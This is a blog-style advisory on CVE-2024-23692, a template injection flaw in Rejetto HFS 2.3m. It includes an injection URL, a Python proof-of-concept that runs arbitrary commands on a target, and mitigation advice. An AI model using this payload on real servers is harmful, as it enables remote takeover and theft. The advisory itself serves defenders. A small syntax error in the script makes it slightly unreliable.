CVE-2024-23692 - Critical Template Injection in Rejetto HFS 2.3m (with Exploit Example)

Rejetto HTTP File Server (HFS) has been a popular choice for quickly sharing files over HTTP. However, a dangerous vulnerability exists in its final release, version 2.3m—and all earlier—letting attackers run system commands from afar. In this article, we’ll break down CVE-2024-23692, show you how it works, offer a proof-of-concept exploit, and recommend what you can do to protect yourself.

What is CVE-2024-23692?

This CVE refers to an unauthenticated template injection bug: attackers can sneak their own code into a template field in HFS, tricking the server into running commands they pick. This can mean total remote compromise—the bad guys can take control of your server.

Status:
As of the CVE assignment, HFS v2.3m is end-of-life (no more updates are coming). The bug affects all versions up to and including 2.3m.

Original advisory and references

- NVD official entry
- Rejetto official site

Technical Breakdown

HFS uses “templates” to serve web pages. With template fields, things like %user% or %folder% get replaced by real data. But, if a user request puts unexpected code in, HFS sometimes interprets it—even if that code is a dangerous system command.

The default template’s search feature is especially risky: attackers can use a special URL to “inject” system commands using template syntax like {.exec|YOUR-COMMAND-HERE.}, which HFS will then execute on the server.

1. Send a Specially Crafted URL

Attackers can use the search endpoint and abuse the template parser.

For example, to execute the Windows calc.exe calculator, they might send

http://TARGET-IP/?search=={%{.exec|calc.exe.}%}

Or, to open a reverse shell (most dangerous!), they can run PowerShell or cmd commands.

2. Code Snippet: Python Proof-of-Concept

Below is a simple Python exploit. This will tell HFS to execute any supplied command.

import requests
import sys

if len(sys.argv) < 3:
    print(f"Usage: {sys.argv[]} http://TARGET-IP COMMAND")
    sys.exit(1)

url = sys.argv[1]
cmd = sys.argv[2]

# Make the injection string
payload = '{.exec|' + cmd + '.}'

params = {
    'search': '==' + payload
}

try:
    resp = requests.get(url, params=params, timeout=10)
    print(f"Server HTTP status: {resp.status_code}")
    print("---- Response ----")
    print(resp.text)
except Exception as e:
    print(f"Error: {e}")

Usage

python exploit_hfs_cve2024-23692.py http://192.168.1.100:808 "cmd.exe /c whoami"

This will try to run whoami on the vulnerable HFS server.

3. Viewing Output

If the command's output is dumped in the page (depends on the template and command), it’ll show up in the browser or terminal. Attackers can chain commands to upload web shells or create malicious users.

Block public HTTP access: Only share files internally.

- Remove (or edit) templates: You could, in theory, remove or lock down template fields, but best to move off HFS altogether.
- Upgrade: Consider switching to HFS v3 BETA (from their GitHub page) or another file sharing solution.

Impact

A single GET request can let a stranger launch malware, install ransomware, steal files, or use your server in bigger attacks (like botnets). This bug is “wormable”—malware could automatically spread from server to server.

Real-world scenario:
If your HFS is exposed to the internet, even for a short time, bots can quickly find and abuse this flaw.

Final Thoughts

- CVE-2024-23692 is simple for attackers to exploit, and it gives them full control over the server.

If you use HFS 2.3m or older, disconnect and upgrade or replace it now.

- Check your logs for suspicious requests to /search!


Further reading:
- CVE-2024-23692 on Mitre
- Proof-of-concept exploits on GitHub (search for CVE-2024-23692)

Timeline

Published on: 05/31/2024 10:15:09 UTC
Last modified on: 08/01/2024 23:15:46 UTC